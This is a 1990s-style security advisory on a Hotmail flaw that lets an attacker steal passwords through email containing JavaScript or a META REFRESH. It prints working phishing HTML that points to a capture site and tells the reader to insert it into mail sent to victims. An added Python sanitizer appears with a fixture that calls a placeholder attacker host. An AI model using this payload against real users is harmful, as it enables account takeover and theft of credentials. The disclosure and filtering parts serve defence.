COMMAND

    Hotmail

SYSTEMS AFFECTED

    Users with an inbox on www.hotmail.com

PROBLEM

    Tom Cervenka found a serious security hole in Microsoft's Hotmail
    service which allows malicious users to easily steal the passwords
    of Hotmail users.  The exploit involves sending an e-mail message
    that contains embedded JavaScript code.  When a Hotmail user views
    the message, the JavaScript code forces the user to re-login to
    Hotmail.  In doing so, the victim's username and password are sent
    to the malicious user by e-mail.  See the demo at:

        http://www.because-we-can.com/hotmail/default.htm

    Once a malicious user knows  the password to the victim's  Hotmail
    account, he can assume full control of the account, including  the
    ability to:

        - delete, send, and read the victim's e-mail
        - check mail on other mail servers that the victim has
          configured for mail-checking
        - access the victim's address book
        - discover other passwords sent as confirmation of
          registration in old e-mails
        - change the password of the Hotmail account

    The security problem is dangerously easy to take advantage of.  A
    would-be hacker needs only to embed the JavaScript code into the
    body of an e-mail message using a standard e-mail program such as
    Netscape Mail (free).  The working demonstration and full
    description of this exploit at the URL above show that even users
    without their own Internet service provider (ISP) can steal an
    arbitrary number of Hotmail passwords by using a free Geocities
    account.  The "Hot"mail exploit is a serious security concern for
    the following reasons:

        1. The malicious code runs as soon as the e-mail message is
           viewed.
        2. The resources required to launch the attack are minimal and
           freely available.
        3. The malicious e-mail can be sent from virtually anywhere,
           including libraries, Internet cafes, or classroom terminals.
        4. The exploit will work with any JavaScript-enabled browser,
           including Microsoft Internet Explorer and Netscape
           Communicator.

    This is a variation on the Spartan Horse announced by Dan Gregorie
    over a week ago, and covered on news.com on the 14th.  The Spartan
    Horse is available for viewing at:

        http://www.thetopoftheworld.com

    The news.com article is at:

        http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d

    The variation is that the Spartan Horse, as designed on the
    www.thetopoftheworld.com site, mimics the Windows 95/98
    Dial-Up Networking dialog box.

    Jonathan James studied Mr. Cervenka's findings and then started to
    experiment.  There is a way to do this to a browser that has
    JavaScript disabled.  Just put a META REFRESH tag into the HTML
    file; its URL should point to the page which does the actual
    capturing and sending of the login/password.  This is shown in the
    example below.  It has been tested on IE 4.0 and later and on
    Netscape 3.0 and later.  The code below should be inserted into
    the mail that is sent to the victim.

        <html>
        <head>
        <!-- META REFRESH: works even when JavaScript is disabled -->
        <meta http-equiv="refresh" content="1; url=http://www.because-we-can.com/hotmail/default.htm">
        </head>
        <body>
        <P>Hotmail flaw. (second version)
        <script>
        errurl="http://www.because-we-can.com/hotmail/default.htm";

        // point the links in the Hotmail menu frame at errurl
        nomenulinks=top.submenu.document.links.length;
        for(i=0;i<nomenulinks-1;i++){
        top.submenu.document.links[i].target="work";
        top.submenu.document.links[i].href=errurl;
        }
        // same for the links in the work frame
        noworklinks=top.work.document.links.length;
        for(i=0;i<noworklinks-1;i++){
        top.work.document.links[i].target="work";
        top.work.document.links[i].href=errurl;
        }
        </script>
        </body>
        </html>

    A web page that supplies you with the code has also been set up:

        http://home7.swipnet.se/~w-78566/hotmail/

SOLUTION

    Both Microsoft and Hotmail have been notified that a security
    problem exists.  The following information about the "Hot"Mail
    exploit is being made publicly available to speed the process of
    fixing the security hole and to inform users how they can protect
    themselves.  It appears that Hotmail has put in a fix for this by
    rewriting <script> as <comment> (s/<script>/<comment>/ or some
    variation) when you view a message.
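    The following is an added illustration, not code from the advisory
    or from Hotmail, of why a bare <script>-to-<comment> rewrite does
    not close the META REFRESH variant above, and what a mail filter
    that does has to drop.  The sample message and the host
    attacker.example are constructed placeholders.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed sample (not the advisory's literal message) carrying both the <script>
# variant and the META REFRESH variant; attacker.example is a placeholder host.
SAMPLE = (
    '<html><head><meta http-equiv="refresh" '
    'content="1; url=http://attacker.example/default.htm"></head>'
    '<body><p>Hotmail flaw. (second version)</p>'
    '<script>errurl="http://attacker.example/default.htm";</script>'
    '<a href="javascript:steal()" onclick="steal()">Inbox</a></body></html>'
)

def naive_fix(html):
    """The mitigation the advisory attributes to Hotmail: rewrite <script> as <comment>."""
    return re.sub(r"<(/?)script\b", r"<\1comment", html, flags=re.IGNORECASE)

class MailSanitizer(HTMLParser):
    """Rebuilds the markup, dropping script bodies, META/BASE/FORM tags and active attributes."""
    DROP_WITH_BODY = {"script", "style", "iframe", "object", "embed"}
    DROP_TAG = {"meta", "base", "link", "form"}

    def __init__(self):
        super().__init__()
        self.out, self.skip = [], 0   # skip > 0 while inside a dropped element body

    def handle_starttag(self, tag, attrs):
        if tag in self.DROP_WITH_BODY:
            self.skip += 1
        elif not self.skip and tag not in self.DROP_TAG:
            kept = "".join(
                f' {n}="{escape(v or "", quote=True)}"' for n, v in attrs
                if not n.startswith("on")                       # onclick=, onload=, ...
                and not (v or "").strip().lower().startswith("javascript:")
            )
            self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in self.DROP_WITH_BODY:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag not in self.DROP_TAG:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))   # text must never become markup

def sanitize(html):
    p = MailSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)
```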